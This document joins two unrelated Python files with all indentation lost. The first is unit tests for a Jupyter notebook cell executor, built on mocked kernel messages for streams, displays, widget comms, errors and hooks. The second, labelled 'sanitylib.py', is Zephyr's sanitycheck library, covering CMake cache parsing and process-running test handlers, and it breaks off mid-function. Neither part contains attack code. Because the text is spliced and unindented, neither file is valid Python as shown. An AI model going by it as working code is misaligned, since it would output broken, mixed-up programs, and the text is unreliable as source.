@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_stream_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout then stderr stream followed by an idle
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
)
def test_clear_output_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Ensure the output was cleared
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
)
def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Should be true without another message to trigger the clear
self.assertTrue(executor.clear_before_next_output)
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert not executor.clear_before_next_output
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
},
)
def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert executor.clear_before_next_output
# Ensure the output wasn't cleared yet because update_display doesn't add outputs
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0, execution_count=21)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 21
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
}
)
def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should also consume the message stream
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
}
)
def test_widget_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message without buffer info followed by an idle
assert message_mock.call_count == 2
self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
# Buffers should still be empty
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
}
)
def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 2
assert executor.widget_state == {'foobar': {'foo': 'bar'}}
assert executor.widget_buffers == {
'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
},
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]},
},
},
)
def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 3
assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}}
assert executor.widget_buffers == {
'foobar': {
('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']},
('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']},
}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {
'comm_id': 'foobar',
# No 'state'
'data': {'foo': 'bar'},
},
}
)
def test_unknown_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An unknown comm message followed by an idle
assert message_mock.call_count == 2
# Widget states should be empty as the message has the wrong shape
assert not executor.widget_state
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_with_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
}
)
def test_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar_other'},
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_display_data_same_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 4
# Original output should be manipulated and a copy of the second now
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 2
# Display updates don't create any outputs
assert cell_mock.outputs == []
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar2'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 3
# Display updates don't create any outputs
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an update then an idle
assert message_mock.call_count == 3
# Original output should be manipulated
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
}
)
def test_error_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_and_error_status_messages(self, executor, cell_mock, message_mock):
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Cell outputs should still be copied
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# OK
'content': {'status': 'ok'},
},
)
def test_error_message_only(self, executor, cell_mock, message_mock):
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_allow_errors(self, executor, cell_mock, message_mock):
executor.allow_errors = True
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error', 'ename': 'NotImplementedError'},
}
)
def test_allow_error_names(self, executor, cell_mock, message_mock):
executor.allow_error_names = ['NotImplementedError']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_raises_exception_tag(self, executor, cell_mock, message_mock):
cell_mock.metadata['tags'] = ['raises-exception']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_no_source(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(
# Stripped source is empty
source=' ',
metadata={},
cell_type='code',
outputs=[],
)
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks()
def test_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[5:]:
hook.assert_not_called()
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell_hooks(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
hooks = [MagicMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:1]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[1:]:
hook.assert_not_called()
@prepare_cell_mocks()
def test_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute_cell(cell_mock, 0)
for hook in hooks[:3]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_async_cell_hooks(self, executor, cell_mock, message_mock):
hooks = [AsyncMock() for i in range(7)]
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
for hook in hooks[:4]:
hook.assert_called_once_with(cell=cell_mock, cell_index=0)
for hook in hooks[4:]:
hook.assert_not_called()
|
sanitylib.py | #!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
